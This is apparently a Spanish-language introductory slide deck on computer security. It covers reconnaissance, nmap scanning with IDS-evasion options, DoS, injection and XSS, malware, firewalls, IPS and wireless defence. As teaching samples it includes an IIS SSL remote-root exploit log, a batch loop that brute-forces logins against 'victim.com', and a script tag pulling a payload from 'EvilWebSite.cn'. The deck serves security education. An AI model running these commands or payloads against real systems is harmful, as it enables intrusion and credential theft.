Introduccion a la Seguridad informatica

La confianza es la mejor conexión

• INTRODUCCION A LA
SEGURIDAD INFORMATICA
• TIPOS DE AMENAZAS
• AMENAZAS TCP/IP
• AMENAZAS DE APLICACIÓN
• MALWARE
• RECESO
• ING SOCIAL
• TIPOS DE FIREWALL
• TIPOS DE IPS
• HEURISTICA Y AV
• SEGURIDAD WIRELESS
TEMARIO

SEGURIDAD INFORMÁTICA

CONFIDENCIALIDAD
INTEGRIDAD
DISPONIBILIDAD (Aviability)
CARACTERISTICAS DE UN SISTEMA SEGURO(CIA)

ANÁLISIS DE RIESGOS

The Open Source Security Testing
Methodology Manual
OSSTMM
Es posible bajar el manual en español:

SEGURIDAD EN PROFUNDIDAD

AMENAZAS DE RED

TIPOS DE AMENAZAS
MALWARE
INFILTRACION
DDOS ATTACK
ROBO DE INFO. Phishing
FRAUDES
SPAM

• LAMERS
• USUARIO INTERNO
TIPOS DE ATACANTES
“Si conoces al enemigo y a ti mismo,
no debes de temer por los resultados
de cientos de batallas” Sun Tsu

Vulnerabilidad y Exploit
Es la debilidad o hueco en un sistema por el cual un atacante puede utilizar
algún método para explotarla.
Un exploit es aquel proceso o software que ataca
una vulnerabilidad particular de un sistema o
aplicación.

CICLO DEL HACKING

RECONOCIMIENTO

Información Inicial enumeración
[bash]$ nslookup
Default Server: dns2.acme.net
Address: 10.10.20.2
>> set type=any
>> IBW.COM
http://www.borderware.com/
http://network-tools.com/

Enumeración de Servicios

Es el proceso de crear un perfil completo de los recursos IT del objetivo. Internet,
Intranet, accesos remotos, extranet y Miscelaneos.
Footprinting
Search String Potential Result
c:winnt Turns up servers with pages that
reference the
standard NT/2000 system folder
c:inetpub Reveals servers with pages that
reference the
standard NT/2000 Internet services root
folder
TSWeb/default.htm Identifi es Windows
Server 2003 Terminal Services
accessible via browser-embedded ActiveX
control

2
Encapsulámiento de Paquete TCP/IP
 La data es envia sobre el stack de capas
 Cada capa adiciona su header
22Bytes 20Bytes 20Bytes 4Bytes
64 to 1500 Bytes

TCP HANDSHAKE
2
PC PC
TCP State TCP StateTCP Packet
Closed
SYN-sent
ACK-received
Established Established
SYN-received
ACK-sent
Listen
SEQ = 1000, CTL = SYN
SEQ = 750, ACK = 1001, CTL = SYN | ACK
SEQ = 1000, ACK = 751, CTL = ACK

Sniffer

EXPLORACION DE RED

Uso de NMAP www.nmap.org
 Es un escaneador de puertos (Port Scanner) - nos indica que puertos están
abiertos en una dirección IP. Es herramienta de línea de comando, se puede
instalar en Windows o Linux.
 Los atacantes lo usan para descubrir que puertos tenemos abiertos en nuestros
equipos.
 Importante recordar que cada puerto es un punto de ingreso al sistema por lo
cual tenemos que es asegurarnos que solo los puertos necesarios están abiertos
en nuestros servidores en la DMZ.
 Tenemos que usar Nmap de regularmente y fijar que puertos tenemos abiertos.
 Existen varios escaneadores de puertos, Nmap es el mas popular por su
variedad de comandos

 Nmap 10.0.0.1
Nmap escaneara el IP 10.0.0.1,si no se le indica que puertos escanear nmap
escaneara 900 puertos mas populares.
• Nmap –p 80 www.cisco.com
con la opción –p indicamos el puerto. Nmap verificara si puerto 80 esta abierto
en www.cisco.com
• NMAP –p 80,21,1433 10.0.0.1/24
nmap escaneara todo el rango 10.0.0.1/24 y verificara si los puertos 80,21,1433
estan abiertos en cada IP.

 Nmap –sS –p 80 www.cisco.com
Nmap no enviara el tercer paquete (ACK) de esa forma no se complete el 3 Way
Handshake y no se establece la conexión. De esa forma el atacante intenta
ocultar el escaneo de puertos para no ser detectado por el Admin del servidor.
esta opción de escaneo se usa también para evitar detección por un IDS/IPS

 Nmap –T0 -p 80,21,1433 www.cisco.com
Para evitar detección por un IPS/IDS se puede controlar la
velocidad que Nmap envié los SYN ,se puede configurar
- T 0-5 cuando el 0 es el mas lento, NMAP esperara 5
minutos entre cada envio de paquete SYN la opción 5 es
la mas rápida por defecto Nmap escanee –T3 si no se
menciona ninguna opción de velocidad.

3
Ataques de RED (L2/3/4)
Denial of Service (DoS)
SYN flood
Smurf
Distributed DoS
Spoofing
IP spoofing
ARP poisoning
Web spoofing
DNS spoofing

Sniffer
• La existencia de un sniffer en la red interna o la DMZ puede
indicar que el servidor fue comprometido o que un empleado esta
capturando informacion en la red interna que no le corresponde.
• Uno de los primeros pasos que va hacer un hacker despues que
compromete un servidor sera instalar un sniffer local

SPOOFING Y SOURCE Routing
El origen de un dirección IP puede ser cambiado
Address spoofing
Usando direccion fuente para autenticación
r-utilities (rlogin, rsh, rhosts etc..)
Internet
2.1.1.1 C
1.1.1.1 1.1.1.2A B
1.1.1.3 S
• A dice ser B para el server S?
• Spoofing
• C pasar por B para el server
S?
•Source Routing

Ejemplo de robo de sesión (Session Hijack)
Alice Bob
Eve
Soy
Bob! Soy
Alice!
1. Eve se convierte en hombre en
medio a través de algun mecanismo.
Por Ejemplo: Arp Poisoning, social
engineering, router hacking etc...
2. Eve puede monitorear tráfico
entre Alice y Bob sin modificar
secuencias ni parametros.
3. Eve puede asumir la identidad de
Bob o Alice a traves de hacer Ip
Spoofing. Esto rompe la pseudo
conexción a medida que Eve
comienze a modificar el número de
secuencia

Denegación de servicio(DoS)
(DDoS)
Objectivo  Deniega algún servico corriendo en
una máquina, usualmente se realiza haciendo
sobrecarga en el server o RED
Consumo de recursos del Host
TCP SYN floods
ICMP ECHO (ping) floods
Consumo de ancho de banda
UDP floods
ICMP floods

3
Ping de la muerte
El atacante envia paquetes ilegales de eco con mas
bytes de lo permitido, causando fragmentación de
datos. El exceso de datos guardados causa buffer
overflows, kernel dumps, y Bloqueos de sistema.
Esto se hace posible por ciertos Windows OSs que
permiten non-standard ICMP (Internet Control Message
Protocol)
El largo del paquete máximo ICMP es 65507 bytes.
Cualquier paquete de eco que lo exceda causa
fragmentacion y el receptor trata de reconstruir el
paquete almacenandolo en buffer hasta desbordarlo.

Ping Flood
Sistema atacante
Internet
Broadcast
Enabled
Network
Victima

•SYN FLOOD ATTACK
TIPOS DE DENEGACION DE SERVICIO

Ataque de DDoS
Server
Atacante
Usuarios Legítimos
Interweb
Ips
comprometidas
Service
Requests
Conexiones
Flood del
atacante
Cola del Server
llena, Deniega
servicio a los
usuarios legítimos
Clientes
solicitando
Servicios

ATAQUE DE SMURF

4
UDP-flood attack
Variante de DoS
Envia a la maquina viCtima servcios de eco(haciendo Spoofing) para crear
loops infinitos entre dos Servicios UDP
No se requiere tener una cuenta basta con la conectividad.
Ip source= victimip, ip destination192.168.1.255
Ip source 10.0.1.2 ip dest]=10.0.1.3

Ataques de capa de aplicación

Un overflow es, básicamente, cuando resguardamos espacio de memoria
insuficiente para una variable y le introducimos más datos a de los que puede
soportar. La variable "desborda", y los datos que no caben
sobrescriben memoria continua a dicha variable.
Ejemplo: Declaramos 8bytes
Insertamos 10bytes
2 bytes restantes sobre rescriben la memoria contigua a dicha variable
BUFFER OVERFLOW

Denegación de servicio (aplicación o sistema)
Inyección de código de manera estructurada sobre una aplicación o sistema
de manera que tome control de algún shell msdos , terminal, remote desktop.
Ataques Buffer Overflow
C:>iisexploit www.site.com myserver 8082
THCIISSLame v0.3 - IIS 5.0 SSL remote root
exploit
tested on Windows 2000 Server german/english
SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)
[*] building buffer
[*] connecting the target
[*] exploit send
[*] waiting for shell
[*] Exploit successful ! Have fun !

Es una forma especializada de validación de entradas
que intenta manipular la base de datos de la aplicación
lanzando sentencias SQL codificadas a dicha aplicación
aprovechando vulnerabilidades de la programación.
INYECCION SQL

Es la vulnerabilidad mas comun de los sitios Web!
Es una brecha en el desarrollo del sitio Web no es un problema de la base de
datos o del Server Muchos programadores lo pasan desapercibido.
Muchas aplicaciones reconstruyen los queries con concatenación de caracteres.
Los programadores no hacen validación de entradas según el campo.
Inyección SQL

Cross-Site Scripting (XSS)
Brinda oportunidades de ingeniería social para los
phishers
Generalmente se usa en conjunto con ataques DbD
En Abril, la Fundación Apache fue hackeada con
XSS
Cross-Site Scripting (XSS): En general, una técnica
de ataque que permite al atacante ejecutar un
script en la computadora de la víctima bajo el
contexto de otro sitio web que la víctima confía.
Este ataque explota la confianza que el usuario
tiene por un sitio particular.

ATAQUES XSS
XSS Vulnerabilidad que afecta un Sever pero la victima final son los usua
El atacante injecta
Javascript en submit
El usuario se loguea y corre el
script en el submit
El servidor responde
con el scriptEl javascript se ejecuta
en el bwoser del user
El browser del usuario envia el
token de la session al atacante
El atacante roba la session del
usuario

Ataques de Diccionario
Ataques de Fuerza bruta
Ataques de Autenticación
C:>FOR /F "tokens=1,2*"
%i in (credentials.txt)^
More? do net use
victim.comIPC$ %j
/u:victim.com%i^
More? 2>>nul^
More? && echo %time%
%date% >> outfile.txt^
More? && echo
victim.com acct: %i pass:
%j >> outfile.txt

Ataques de autenticación Fuerza Bruta

Drive-by Downloads (DbD)
DbDs, ahora más destacado que las
amenazas nacidas en el e-mail
Los criminales venden y soportan esquemas
de ataques web fáciles de usar
Sophos encuentra cerca de 30,000 nuevos
sitios maliciosos cada día
Drive-by download (DbD): Es cuando el malware es bajado por
la fuerza en su computadora sin su conocimiento o interacción.
Tipicamente ocurre cuando un sitio maliciosos explota una
vulnerabilidad de seguridad basada en el browser para forzar a
su computadora a ejecutar código que baja malware.

Ataques Web Combinados
DBDB
Parte 1: Ataque automatizado SQL InjectionParte 2: Drive-by Download
<iframe><script src=“http://EvilWebSite.cn/EvilJavaScript.js”></scirpt></iframe>

•Proceso manual o automatizado que trata de encontrar
vulnerabilidades en una red o servicio.
•Puede ser hasta del tipo intrusivo y aplicar exploit al
sistema escaneado.
•Herramienta de gran ayuda al administrador de red pero
maligno en manos de terceros (HACKERS).
ESCANEO DE VULNERABILIDADES

Ataque de Dia Cero
Ventana de Vulnerabilidad

 Malware
Malicious software
Software malicioso
Algunos tipos de Malware:
 Adware
 Troyano
 Dialer
 Hijacker
 Keylogger
 Phishing
 Spam
 Spyware
 Ventanas emergentes
 Virus
 Worms o gusanos
 ...
Lo más común es que aparezcan combinados
54
Clasificación del Malware

Tipos de Virus
Polymorfico: Usa un motor polymorfico para mutar en su codigo mientras
mantiene intacto su algoritmo original (packer)
Methamorfico : Cambia después de cada infección
Malware
Host infectado
Executable
Packer
Payload

 Malware
 Worms o gusanos
 ¿Qué es?
 Programa autoreplicante que no altera los archivos del
sistema sino que reside en la memoria y se duplica a sí
mismo enviándose por email o a través de la red.
 ¿Cómo se evita?
 Teniendo activo el firewall
 Actualizando windows regularmente.
 Comprobando que el antivirus está actualizado y activo.
56

La palabra Adware nace de la contracción de las palabras Advertising
Software (publicidad no solicitada).
Despliega publicidad sobre productos y/o servicios a través de pop-
ups o barras que se adhieren a los navegadores. Doubleclick, Cydoor,
Gator Corporation.
Clasificación del Malware
 Malware
 Adware
 ¿Qué es?
 Software que durante su funcionamiento muestra
publicidad de distintos productos o servicios.
 No usar software de dudoso origen
 No visitar páginas web de dudoso origen.

Los troyanos simulan ser inofensivos, útiles y benignos pero en realidad
esconden funcionalidades maliciosas.
Suelen acceder a la computadora simulando ser la demo del anticipo de algún
juego, en un mensaje de correo electrónico e incluso mediante aplicaciones de
mensajeria instantánea
 Malware
 Troyano
 ¿Qué es?
• Software dañino disfrazado de software legítimo que
permite que un extraño controle nuestro PC.
 No usar SW de dudoso origen
 Escanear con el antivirus cualquier dato o programa
recibido.
 Comprobar que el antivirus está actualizado y activo.

Tipos de troyanos
Troyano backdoor: habilita un canal de acceso no convencional en el
sistema permitiendo que otros códigos maliciosos y/o personas
accedan al mismo cuantas veces quieran.
Troyano drooper: se caracteriza por ejecutar otros códigos maliciosos
al momento de su ejecución.
Troyano keylogger: monitorea y registra todo lo que se teclea. Muchos
de ellos poseen la capacidad de capturar imágenes y videos.
Troyano bancario: orientados a la ejecución de ataques de phishing.
Manipulan a la víctima para que de manera “voluntaria” brinden
información sensible. En muchos casos realizan pharming local.
Troyano downloader: se caracteriza por descargar otros códigos
maliciosos mientras se encuentra activo.
Troyano bot: convierte una computadora en zombi. Cada una de estas
computadoras zombis formarán parte de redes botnet.

Ejemplos de troyanos y gusanos

Rootkits
Rootkits pueden esconder virtualmente todo:
Procesos
Files, directories, Registry keys
Servicioss, drivers
TCP/IP ports
rootkit technology:
User-mode hooking
Kernel-mode hooking
Codigos de Parche
Escondidos sobre otros procesos

El Spyware (Spy Software) tiene como objetivo recolectar información
sobre una persona u organización. Crea perfiles de usuarios con
información sobre sus hábitos de navegación.
La información se distribuye a empresas publicitarias u
organizaciones interesadas. Bonzo Buddy, Alexa, Hotbar.
Los programas Rogue son aplicaciones del tipo shareware que simulan
ser herramientas de seguridad e instalan adware y/o spyware.
Despliegan alertas exageradas sobre supuestas infecciones
incentivando al usuario a adquirir dicha aplicación.

Botnets: Lo último en amenazas mezcladas
Distributed Denial of Service (DDoS)
Spamming
Phishing
Click Fraud
Robo de ID (a escala masiva)
Password Distribuido/hash cracking
Instalar malware adicional
Acceso de Puerta Trasera
Keylogging / espiar a la víctima
Robar credenciales
Proxy a través de la víctima
Apalancamiento en la mayoría de ataques
Los Botnets son la Navaja Suiza
del mundo del malware, y los que
los usan tienen muchas hojas de
donde escoger.

Zeus v3 (Zbot), Mpack, Zunker
• Viene como un kit de crimeware pre-
empaquetado
• Muy orientado a ataques bancarios en
linea
• Roba credenciales de Bancos y Redes
Sociales
• Genera páginas de phishing
localmente (web page injection)
• Responsable de muchos ataques de
malware
• Algunos estiman que ha infectado a 1
de cada 100 computadoras
• Chequee:
https://zeustracker.abuse.ch

ATAQUE DE INGENIERIA SOCIAL

Ingeniería Social
“Usted puede tener la mejor tecnología, los mejores firewalls, los mejores sistemas
de detección de intrusos o los mejores dispositivos biométricros.
Lo único que se necesita es un llamado a un empleado desprevenido e ingresar sin m
Kevin D. Mitnick

PISHING

Malware e Ing.Social combinados
en Facebook (Koobface)

lEs una especie de Hacking y Phishing avanzada en el que se envenenan los
registros de servers DNS o los registros Host de la PC
•http://google.com
•Sever
Google.com
•Server
Fraudulento
•Flujo Normal a la
ip de Google
•Resolución
envenenada hacia
Ip del server de
Fraude
PHARMING

Ing. Social y Falso Antivirus(rogue)

AMENAZAS PERSITENTES AVANZADAS
An Advanced Persistant Threat
(APT).
Three APT
Atributos:
1. Avanzada
2. Persistente
3. Polymorfa
4. Focalizadas

SEGURIDAD DE PERIMETRO
• Filtrado de paquetes (Mínimo y básico)
• Firewalls
• Filtro de contenido (Web y correo)
• Antimalware
• IPS
• NGF
• UTM
• WAF

¿Dónde opera un Firewall?
Punto de conexión de la red interna con la red exterior
Zona Desmilitarizada (DMZ)

Tipos de Política de Entrada
(Filtros INGRESS) y Salida (Filtros EGRESS)
 Los filtros de salida o Egress son métodos de filtrar tráfico desde
la red interna hacia afuera o hacia redes externas (LAN hacia WAN).
 Los filtros de entrada o Ingress son métodos de filtrar tráfico
desde las redes externas hacia las redes internas (WAN hacia LAN).

Políticas de Filtrado de
Paquetes de Estado (Stateful)
 Siguen el rastro de las sesiones de los paquetes TCP,
rastreo de origen, destino de direcciones y puertos.
Evita robo de sesion, spoofing y conexiones anormales
en tcp utilizadas por escaneos.
 Mantiene el control del estado de sesiones TCP/UDP
incluyendo el re-ensamble de paquetes tcp e icmp. No
permitiendo el paso de ataques fragmentados que
exploten a la hora de unirlos.(Ej ping de la muerte o
algun tipo buffer overflow).
 Soporta autenticación y timeouts de sesiones.

Ejemplo de Filtrado de Paquetes
de Estado

Politicas Stateful Inspection
En la mayoria de las comunicaciones TCP (normales), las
computadoras inician lo que es llamado “3-way handshake (TCP)”
Hola mi nombre es Pedro(SYN)
Hola Pedro, mi nombre es Jose (SYN/ACK)
Mandame tus datos (ACK)
Un firewall “Stateful” inspection monitorea estas conexiones
NO LOS DATOS, solo la información de las conexiones
client.com.4567 > server.com.21: S 1234567890:1234567890(0)
server.com.21 > client.com.4567: S 3242456789:3242456789(0) ack
1234567890
client.com.4567 > server.com.21: . ack 1

Conexión anormal en un Filtro de
EstadoA stateful inspection firewall “inspects” the “handshake”
Adios Jose, mi nombre es Pedro (END)
Hola Pedro, mi nombre es Jose (SYN)
Adios Pedro, mi nombre es Jose (End)
Si hay algo anormal en la comunicación,
el firewall bota o ignora la conexión.

FILTRADO PUERTAS TRASERAS
Solo se debe abrir los puertos necesarios a través del fw.
Solo se permite puerto DNS a los destinos confiables

Limitantes de los Filtros de Estado
 No logran revisar el contenido de la aplicación del
paquete en su totalidad
 No detienen exploits basados en anomalias de
protocolos de capa de aplicación como HTTP y FTP
(Buffer overfolw sobre aplicacion o headers anómalos)
 Son más eficientes pero menos proactivos a la hora de
detener un ataque de dia zero (hasta nivel de capa 4)
 No evitan conexiones salientes o entrantes por puertos
conocidos como HTTP o POP3 que no hablen dicho
protocolo (conexión de troyanos o botnets que ocupen
protocolos de trabajo como el http,smtp,dns etc)

Políticas de filtrado Alg o Proxy
 Actúa dentro de los niveles de transporte y
aplicación (circuit level gateway y
application gateway respectivamente)
según el modelo TCP/IP
 Procesa, valida y regenera cada paquete
recibido; impidiendo la conexión directa
entre 2 redes diferentes
 Para cada servicio (telnet, ftp, http...) se
utiliza un proxy específico, pudiendo así
prohibir el uso de determinadas órdenes
de un servicio
4 Transporte
5 Aplicación
3 IP
2 Data Link
1 Físico1 Físico
Application gateway

Diferencia entre Statefull y Proxy
Firmas de AV/IPS Firmas de AV/IPS

Web Server
Cuando la conexión es a través del Packet Filter
1. La conexión se crea en el cliente
2. Va a través del Firewall
3. La conexión termina en el Server
El firewall monitorea la conexión y
aplica las reglas a nivel de capa 3 y 4
Conexión Packet Filter

Web Server
Cuando la conexión es a través del Proxy
1. La conexión es creada en el cliente
2. La conexión termina en el firewall
3. Todos los aspectos de la conexión son
revisados
4. Las conexiones creadas en el firewall
son re-ensambladas
5. La conexión final se manda al Server
Conexión Application Proxy
El proxy revisa el protocolo a nivel de capa de
aplicación; en algunos casos también revisa
headers, comandos, buffers, codificación de
aplicaciones, encriptado (HTTPS), descartando lo
que no es normal a nivel de capa de aplicación.
MAS QUE UN DEEP PACKET INSPECTION

Firewalls de Filtro de Estado
Basados solamente en firmas
5 – Protocolo Anómalo
Xxysws
Ertws&3
sw@!hd
We*@z!
SW@(f&
8 – Queries DNS
A Record
NS
CNAME
SOA
PTR
MX
AAAA
AXFR
Nuevos Exploit s DNS salen
diariamente. Proxy los detiene
sin conocer las firmas
Diferencia significativa de Escaneo
Ejemplo de Protección dia ZERO
(DNS Exploit)

Limitantes de los filtros Proxy
 Los Proxy no son compatibles con todos los protocolos
de red existentes
 Hay reducción en el rendimiento del equipo y las
conexiones debido al procesamiento más intenso en el
escaneo; sin embargo puede balancearse con
incremento de recursos
 La configuración del proxy es más dificultosa que un
packet-filter
 Algunos proxy no hacen escaneo tan minucioso del
protocolo

Limitantes del Firewall en la seguridad de Perímetro
PORT 80
PORT 443
El ataque es un exploit a
nivel de aplicacion sobre
una vulnerabilidad
La seguridad Perimetral permite
solo puertos de trabajo
Buffer Overflow
Cross-Site Scripting
SQL/OS Injection
Cookie Poisoning
Hidden-Field Manipulation
Parameter Tampering
!Host
comprometido
!Comunicacion
centro de
comandos
Salida de una puerta
Trasera a traves
del firewall
!Acceso
forsado a la
informacion
Pero esta abierto a
trafico Web y Dns

IPS
(Intrusion Prevention System)

IDS =Intrusion Detection System=Pasivo
Cuando detecta ataque solo Alerta
IPS =Intrusion Prevention System=Activo
Cuando detecta un ataque lo Bloquea

•NETWORKS (Recolecta la info de LA RED)
•HOST (Software agente en un Host)
•SIGNATURE DETECTION (Firmas de ataques y Malware)
•ANOMALY or Behavior DETECTION (Detecta patrones anormale
TIPOS de IDS (Intrusion Detection System)
IPS (Intrusion Prevention System)

IDS basados en firmas
Caracteriticas
Usa patrones conocidos de firmas para
detectar ataques
Ventajas?
Ampliamente disponible
Rapido
Fácil de implementar
Fácil de actulizar
Desventajas?
No detecta ataques que no estén
en firmas.

Falsos positivos
.
Falso positivo= detecta trafico normal como ataque.
Falso negativo= no detecta un ataque real.
Los IDS/IPS generan miles de falsos positivos.
Uno de los problemas que vemos en nuestros clientes es que ellos
piensan que los IDS/IPS son como en Anti Virus que no requiere mucho
administracion
Conocemos varias empresas que por tener tantos falsos positivos
Apagaron el equipo y no lo usan mas!!

IDS-IPS basado en Comportamiento
Carateristicas
Usa modelos estadísticos o motores de aprendisaje para caracterizar ambientes
normales de uso
Reconoce trafico anormal como intrusiones potenciales
Ventajas?
Podría detectar intentos de nuevos exploit sobre vulnerabilidades sin firma.
Puede detectar autorizaciones fuera del patrón normal
Desventajas?
Generalmente lento, necesita recursos intensivos comparado con el
signature-based IDS
Gran flexibilidad, dificultad al configurar
Altos portcentajes de falsos positivos

IPS hibridos
Hoy en dia existen en el mercado IPS’s que
estan basados en firmas y ademas tienen
capacidad de “Anomaly Detection” estos
son los mas caros pero tienen las ventajas
de ambos mundos

•CONSOLA DE ADMINISTRACION: Configura y
• presenta la información recolectada por los sensores.
•SENSORES: Análisis de tráfico y firmas, Alarmas,
• Respuestas y contramedidas.
NETWORK IPS

Network IPS
Internet o Wan
DMZ
LAN Servidores Internos

Segmentación de Red en
zonas
LAN DMZ
SERVER INTERNOS
INTERNET

Host Intrution Detection Systems (HIDS)
los HIDS son agentes que se instalan en los servidores (en
general en la DMZ).
Los HIDS son un complemento de los IDS/IPS. Detectan
cualquier actividad del atacante en el servidor mismo; el HIDS
Alerta si se borraron los logs, si se habilito un nuevo servicio en
el servidor o si creo un muevo usuario en el sistema. Para un
atacante es imposible no ser detectado por el HIDS
**** Tenemos varios clientes que instalan solo los HIDS y no
colocan el NIDS

NGFWs
Next Generation Firewall
IPS APPLICATION
CONTROL

FIREWALL UTM
( MANEJO UNIFICADO DE AMENAZAS)
• CONTROL DE APLICACIÓN
• WEB FILTER POR CATEGORIA
• IPS PERIMETRO
• AV PERIMETRO
• REPUTACION DE IP
• VPN
• ANTI SPAM

WAF(Web application Firewall)

ANTI MALWARE

CONSOLA CENTRALIZADA

HEURISTICA = PROTECCION DIA ZERO
Encontrar una solución
por prueba y error o por
reglas basadas en la
experiencia.

HEURISTICA PASIVA
Su
Analiza programas tratando
de encontrar código anómalo
antes de pasarlo a correr en
el proceso central.
Busca patrones de
subrutinas,o llamadas de
programas que indiquen
comportamiento malicioso.

HEURISTICA ACTIVA
Su
El motor ejecuta el código en un
ambiente Virtual
controlado”SandBox”.Analizando
los cambios en el entorno virtual.
La Heurística Activa puede
detectar código malicioso
encriptado, codificado
compresión y código
polimorfo

Av comparatives test de laboratorio

VIRUS BULLETIN RAP(Reactive Proactive
Reports)

EJEMPLOS DE AMENAZAS DE SEGURIDAD WI-FI

WPA/WPA2/MAC Filter
Son esenciales – Pero No son suficiente

CRACK Y EXPLOIT WIRELESS

Autenticación 802.1x

WIPS
(WIRELESS INTRUSION PREVENTION SYSTEM)

SEGMENTACIÓN DE TRÁFICO ,
BLOQUEO DE PUERTOS , IPS

WLAN ADMINISTRADA
• Roaming
• Admin Central
• Multiples SSID
• VLAN
• WMM (Voz, Video)
• QoS
• Seguridad
• Monitoreo y logs
• Standarización
• WIPS

Porqué Soluciones Administradas

 Algo que sabe(preguntas)
 Algo que tiene (tokens, identificaciones,
carnets)
 Algo que es (biométrica, retina, huellas
digitales, voz, etc)
https://howsecureismypassword.net/

VISUALAIZACION DE DATOS

• Casi imposible de identificar factores o patrones clave
• Para el personal IT de seguridad de red es un arduo trabajo
• Incapacidad para tomar decisiones adecuadas
• Falla de cumplimiento de la normativa o regulaciones
GRANDES CANTIDADES
DE LOGS DE DATOS
Los datos por si mismo no tienen valor
tangible . El valor lo da el analisis sobre
ellos y como estos datos son
transformados en informacion y
eventualmente en conocimiento.
—Mark van Rijmenam

SIEM (Security Information and
Event Management)
Security Logging—SANS Survey
Las soluciones SIEM son usuadas para colectar logs de multiples fuentes
•Excelente para usarse en OS, Database, Application, Router, Firewall, UTM
•Los usuarios SIEM reconocen el valor del análisis de datos y correlación de información
•Estos son dificiles de desplegar y gastan tiempo de IT
https://www.sans.org/reading-room/analysts-program/SortingThruNoise
77% 10%24%

 Le da al administrador un parámetro de
la sanidad de la red.
 Nos da información del tráfico que circula
en nuestra red y si tenemos los recursos
apropiados
 Nos permite hacer análisis de
congestiones o problemas de la red
Nos permite darnos cuenta quien y que
escanea mi red
"NO PODEMOS CONTROLAR LO QUE NO
VEMOS”
Para que nos sirven las
Herramientas de Visualización de
la Red

Cuando los sistemas basados en firmas y heurísticas
han fallado, al final el ser humano ha identificado
las amenazas con herramientas de monitoreo.
Identificación de Amenazas

“Más del 95% de las vulnerabilidades de los firewall son
causadas por mala configuración de los mismos, no por
defectos de los equipos”
-Gartner, 2011

RECOMENDACIONES DE SEGURIDAD
• Establecer Políticas de seguridad
• Establecer sitios de contingencia y backups
• Establecer un plan de desastres y recuperación
• Actualizar firmas y parches
• No dejar abiertos servicios innecesarios
• Contar con tecnología apropiada
• Estar actualizado sobre nuevas amenazas
• Educar a los usuarios en materia de seguridad
• Poseer un plan de seguridad
• No ver los sistemas de seguridad como cajas negras..

Gracias !!!

Introduccion a la Seguridad informatica

Recomendados

Recomendados

Más contenido relacionado

La actualidad más candente

La actualidad más candente (20)

Destacado

Destacado (13)

Similar a Introduccion a la Seguridad informatica

Similar a Introduccion a la Seguridad informatica (20)

Último

Último (13)

Introduccion a la Seguridad informatica